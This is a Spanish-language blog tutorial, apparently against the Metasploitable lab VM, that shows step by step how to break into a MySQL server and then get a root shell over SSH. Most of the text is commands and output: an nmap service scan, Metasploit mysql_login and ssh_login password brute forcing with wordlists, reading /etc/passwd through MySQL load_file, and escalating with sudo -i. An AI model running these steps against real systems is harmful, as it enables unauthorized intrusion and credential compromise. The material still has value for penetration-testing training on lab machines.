Intrusión a MySQL y luego obteniendo Shell Root

Hola hoy les haré un pequeño tutorial con metasploit para hacer una intrusión a una base de datos mysql para después poder obtener shell root por ssh

Empecemos...

Escaneamos con NMAP los puertos:
nmap -sV --allports --version-all 192.168.1.34
PORT     STATE SERVICE     VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

Acá lo que nos interesa:
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5

Abramos metasploit
Usaremos el auxiliary
mysql_login
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

Agregamos el host:
  msf auxiliary(mysql_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34

Ahora agregamos con el user que se va a loguear yo en mi caso voy a probar con root:
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root

Y ahora voy a usar la opción PASS_FILE para hacer un brute force :P al login y intentar longuearse con las contraseñas :P
msf auxiliary(mysql_login) > set PASS_FILE /home/linuxfer/Escritorio/pass.txt
PASS_FILE => /home/linuxfer/Escritorio/pass.txt

Ejecutamos el axuriliary:
msf auxiliary(mysql_login) > run
[*] 192.168.1.34:3306 - Found remote MySQL version 5.0.51a
[*] 192.168.1.34:3306 Trying username:'root' with password:''
[*] 192.168.1.34:3306 failed to login as 'root' with password ''
[*] 192.168.1.34:3306 Trying username:'root' with password:'murderking'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'murderking'
[*] 192.168.1.34:3306 Trying username:'root' with password:'duraznin'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'duraznin'
[*] 192.168.1.34:3306 Trying username:'root' with password:'pete'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'pete'
[*] 192.168.1.34:3306 Trying username:'root' with password:'oxono'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'oxono'
[*] 192.168.1.34:3306 Trying username:'root' with password:'puto'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'puto'
[*] 192.168.1.34:3306 Trying username:'root' with password:'root'
[+] 192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

Como vemos se logueo con root root
192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'

Abrimos una nueva terminal y ejecutamos
mysql -h 192.168.1.34 -u root -p root
-h: host
-u:usuario
-p:password

linuxfer@linuxfer-laptop:~$ mysql -h 192.168.1.34 -u root -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 38
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Ya estamos dentro del server mysql
mysql> show grants;
+--------------------------------------------------------------------------------------------------------------------------------+
| Grants for root@% |
+--------------------------------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' WITH GRANT OPTION |
+--------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

Veamos los roots :P
mysql> select load_file('/etc/passwd');
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false

Mmmmmm.. parece que el usuario es msfadmin volvamos a metasploit ahora usaremos el auxiliary
scanner/ssh/ssh_login
msf auxiliary(mysql_login) > use scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

Agregamos host:
 msf auxiliary(ssh_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34

Agregamos el user:
msf auxiliary(ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin

Agregamos las pass con las que queremos que haga el brute force
msf auxiliary(ssh_login) > set PASS_FILE /home/linuxfer/Escritorio/pass2.txt
PASS_FILE => /home/linuxfer/Escritorio/pass2.txt

Ejecutamos el auxiliary:
msf auxiliary(ssh_login) > run

[*] 192.168.1.34:22 - SSH - Starting buteforce
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: ''
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':''
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'jaja'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'jaja'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pete'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pete'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'tutorial'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'tutorial'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'ddlr'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'ddlr'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pam'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pam'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'paquero'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'paquero'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'duraznin'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'duraznin'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
[*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
[+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Que tal se logueo con msfadmin y msfadmin:
*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
[*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
[+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '

Bueno ya esta creada la sessión con la shell veamos:
Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell SSH msfadmin:msfadmin (192.168.1.34:22) 192.168.1.33:58907 -> 192.168.1.34:22
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
pwd
/home/msfadmin
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Bien ahora abramos una nueva terminal y conectemosno por ssh para obtener shell root
linuxfer@linuxfer-laptop:~$ ssh msfadmin@192.168.1.34
The authenticity of host '192.168.1.34 (192.168.1.34)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.34' (RSA) to the list of known hosts.
msfadmin@192.168.1.34's password:

Nos pide pass recuerden que es msfadmin tipeamos y
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Thu Jun 10 15:15:54 2010
msfadmin@metasploitable:~$

Ya tenemos shell ahora solo tenemos que tipear sudo -i la pass msfadmin y ya tenemos shell root
msfadmin@metasploitable:~$ sudo -i
[sudo] password for msfadmin:
root@metasploitable:~# id
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#

Game over (?)

Bueno espero que les halla gustado y hallan entendido bien perdon por no hacer un video pero es que tengo unos problemillas :P


Información extraída de:
http://linuxfer.diosdelared.com/?coment=7363

Entradas populares de este blog

Trinity Rescue Kit: Tutorial para eliminar la contraseña de administrador en Windows

Cómo extraer el handshake WPA/WPA2 de archivos de captura grandes